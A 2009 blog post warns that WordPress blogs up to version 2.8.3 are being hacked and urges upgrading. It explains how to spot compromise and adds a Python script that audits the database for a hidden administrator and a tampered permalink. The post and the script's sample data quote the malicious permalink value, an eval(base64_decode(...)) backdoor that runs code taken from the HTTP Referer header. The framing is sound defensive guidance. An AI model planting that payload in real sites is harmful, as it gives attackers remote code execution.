ALERT: Old WordPress Blogs Under Attack

All WordPress blogs up to version 2.8.3 are reportedly being attacked and hacked.

The latest WordPress version 2.8.4 seems to be SAFE.

The blogs on WordPress.com are SAFE as the WordPress.com system is up-to-date.

Thank you so much to Lorelle on WP for posting about this, which is how I got the news (check Lorelle’s post for all the info).

Update to the Latest WordPress Version

Here’s what you need to do if you have blog(s) that are not updated to the latest WordPress version:

  • Before you continue reading,
  • Go and update ALL YOUR WORDPRESS BLOGS to version 2.8.4.
  • Really, stop reading, it IS that serious.
  • Continue reading after you have UPGRADED your WordPress to the latest version.

Recognizing The Attack

Two clues have been identified for spotting whether you’ve already been hacked (here’s hoping you haven’t been):

  • new administrator
    • A “back door” was created by a “hidden” Administrator.
    • Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.
  • permalinks (Settings –> Permalinks):
    • The keywords to look for are “eval” and “base64_decode”, as in this example:

example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.
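Both clues can also be checked straight from the database instead of the dashboard. The following is an added example, not code from the original post or from WordPress: it assumes the default `wp_` table prefix and the standard `options`, `users` and `usermeta` tables, and it runs against a constructed in-memory SQLite stand-in (the user names are made up) so it works offline.

```python
import re
import sqlite3
from urllib.parse import unquote

# The two keywords the post names as the sign of a tampered permalink setting.
KEYWORDS = re.compile(r"eval|base64_decode", re.IGNORECASE)

def check_permalink(structure):
    """Return the keywords found in the raw or URL-decoded permalink structure."""
    text = structure + "\n" + unquote(structure)  # %7B-style escapes are undone
    return sorted({m.group(0).lower() for m in KEYWORDS.finditer(text)})

def unexpected_admins(db, known_admins, prefix="wp_"):
    """List administrator logins stored in the database that are not expected."""
    rows = db.execute(
        f"SELECT u.user_login FROM {prefix}users u "
        f"JOIN {prefix}usermeta m ON m.user_id = u.ID "
        "WHERE m.meta_key = ? AND m.meta_value LIKE '%administrator%'",
        (prefix + "capabilities",),
    ).fetchall()
    return sorted(login for (login,) in rows if login not in known_admins)

def audit(db, known_admins, prefix="wp_"):
    """Run both checks; returns (permalink keywords, unexpected admin logins)."""
    (structure,) = db.execute(
        f"SELECT option_value FROM {prefix}options WHERE option_name = ?",
        ("permalink_structure",),
    ).fetchone()
    return check_permalink(structure), unexpected_admins(db, known_admins, prefix)

def build_sample_db():
    """Constructed sample data: an in-memory stand-in for a WordPress database."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE wp_options (option_name TEXT, option_value TEXT);"
        "CREATE TABLE wp_users (ID INTEGER, user_login TEXT);"
        "CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);"
    )
    # Tampered value modelled on the example string shown in the post.
    bad = "/%category%/%postname%/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/"
    db.execute("INSERT INTO wp_options VALUES ('permalink_structure', ?)", (bad,))
    db.executemany("INSERT INTO wp_users VALUES (?, ?)",
                   [(1, "admin"), (2, "editor1"), (3, "wpuser2")])
    admin_caps = 'a:1:{s:13:"administrator";b:1;}'  # PHP-serialized role array
    db.executemany("INSERT INTO wp_usermeta VALUES (?, 'wp_capabilities', ?)",
                   [(1, admin_caps), (2, 'a:1:{s:6:"editor";b:1;}'), (3, admin_caps)])
    return db

if __name__ == "__main__":
    print(audit(build_sample_db(), known_admins={"admin"}))
```

A clean permalink structure such as `/%year%/%monthnum%/%postname%/` returns no keywords, and any login in the second list is an administrator account you did not create.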

Secure Your Blog

The News Updates

2009-09-04: News reported on the WordPress.org Support Forums:  HACK WARNING: UPGRADE IMMEDIATELY:

if you don’t upgrade, you will get hacked. It’s not a matter of “if”, it’s a matter of “when”. Don’t wait to be hacked.

2009-09-05: WordPress development blog: How to Keep WordPress Secure

Spread the News!

We need to make sure everyone is informed about this. But stick to the facts, which at the moment are:

  • Old WordPress blogs up to 2.8.3 are reportedly being attacked
  • WP version 2.8.4 seems to be safe

Re-Tweet to make sure EVERY WordPress blogger is aware of this.

And always, always keep your WordPress and plugins in your blog updated to the latest version!

Read all about this here: Old WordPress Versions Under Attack via Lorelle on WP

Original Warning / News on the WordPress.org Forum: HACK WARNING: UPGRADE IMMEDIATELY

Antti Kokkonen


  • I'm one of those who's quite paranoid about leaving my blog not up to date. As soon as I get the notification in my dashboard, I hurry and update as I hate being the only guy left. lol. Some folks do suggest we wait like 2 weeks to a month before updating as there may be even worse bugs in the new versions. Example: WordPress was updated like 4 times in a month starting mid July to mid August cos of security issues.
    .-= Udegbunam Chukwudi's last blog ..Top 10 Ways Nigerians Make Money Online =-.